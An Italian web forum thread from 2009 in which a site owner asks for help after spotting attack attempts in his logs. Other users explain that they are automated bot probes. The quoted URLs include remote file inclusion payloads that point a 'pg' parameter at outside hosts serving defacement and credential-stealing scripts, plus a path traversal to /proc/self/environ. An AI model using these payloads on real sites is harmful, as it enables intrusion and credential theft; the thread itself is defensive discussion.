[Lamer] Tentativi di lameraggio sito

14-07-2009, 18.23.28

Ciao ragazzi, grazie a phpstats ho scoperto che stanno tentando di Lamerarmi il sito, non credo possano farmi danni, ma non so come difendermi.

Gli attacchi avvengono tramite query string, credo siano tentativi di iniezione di codice, vi linko la situazione:

http://morgensterngdr.altervista.org/scheda.php/?pg=http://www.univers-du-pin.be/buggsbunny??

La parte in blu è la pagina del mio sito, quella in rosso è l'attacco, se si va nell'url indicato, viene stampata una pagina che avvisa che il sito è stato crakkato.

E un altra tentativo di attacco l'ho ricevuto così:
http://morgensterngdr.altervista.org//?pg=http://www.x-pronet.com/board/safe1.txt?

Il link apparso questa volta è una riga di codice atta a rubare username e password, come posso difendermi?

Sono veramente preoccupato....

Grazie a tutti del supporto.

EDIT: Altro attacco!!!

http://morgensterngdr.altervista.org/scheda.php/?pg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ

**dreadnaut** · 14-07-2009, 18.26.52

Se tu non leggi il parametro "pg" e non ne esegui il contenuto, che hai da preoccuparti?

Cose del genere avvengono tutti i giorni, gente che cerca siti lamerabili, vecchi cms, etc. Se non sei a rischio, ignorali.

14-07-2009, 18.28.45

Scusa dreadnaut, non ho capito, che intendi con "non leggi il parametro pg"?

Altro tentativo:
http://morgensterngdr.altervista.org/?pg=http://articlecentralstation.com/ab.txt??

**saitfainder** · 14-07-2009, 18.29.22

Ma i tuoi php fanno qualcosa con questo parametro pg? Mi sembra che le tue pagine non prendano nessun parametro e quindi la lamerata non può ottenere alcun effetto... sbaglio?

EDIT:

Intendiamo quel pg= che c'è nella query string. Lo usi in qualche maniera?

14-07-2009, 18.32.42

Ragazzi di php capisco poco e niente, so usare 2/3 funzioni, ma per il resto non c'è ne capisco una cippa, e abiate un pò di compressione, ma sono un pò preoccupato. Quello che state dicendo, se non ho capito male, e che l'attacco sfrutta una fantomatica variebile/form/qualcosa che si chiama pg per estrarre dati dal mio sito, non usando questa variebile non ho di che temere?

EDIT: Di php uso la funzione include, un form mail e lo uso per rilevare il browser del utente per modificare il CSS e in che pagina si trova per stampare o meno un paio di codici JS. In più ho installato phpstats.

**binarysun** · 14-07-2009, 22.17.47

Questi attacchi vengono fatti da bot su tutto internet, partono da un IP e procedono per ogni computer che trovano.
Quelli di questo genere utilizzano un attacco include.

Se come scritto sopra non leggi la chiave pg e non includi il contenuto nella pagina sei a posto.

15-07-2009, 08.59.21

Nei file php hai una stringa $_GET['pg'] o simile?

Ciao!

15-07-2009, 15.15.53

Originalmente inviato da debug

Nei file php hai una stringa $_GET['pg'] o simile?

Ciao!

No, assolutamente no. Non uso completamente $_GET[], uso qualche $_POST[] per il form di invio e-mail.

Ho capito che finche usano pg non riesco niente, se dovessero cambiere inovinando i mie $_POST[] ho le variabili che uso per eseguiere determinate azioni?

**darkwolf** · 15-07-2009, 15.20.56

Ho una 50ina di errori al giorno di questo genere nel log errori.
Nei topic che parlano di Joomla tentano vecchi attacchi a Joomla e via di seguito.
Sono solo bot, non c'è da preoccuparsene

15-07-2009, 15.27.35

Ok, comunque bannando l'ip che li faceva, oggi non ne ho....vedrò nei prossimi giorni. Grazie del supporto.

Discussione: [Lamer] Tentativi di lameraggio sito

LinkBack

Strumenti discussione

Display

[Lamer] Tentativi di lameraggio sito

Regole di scrittura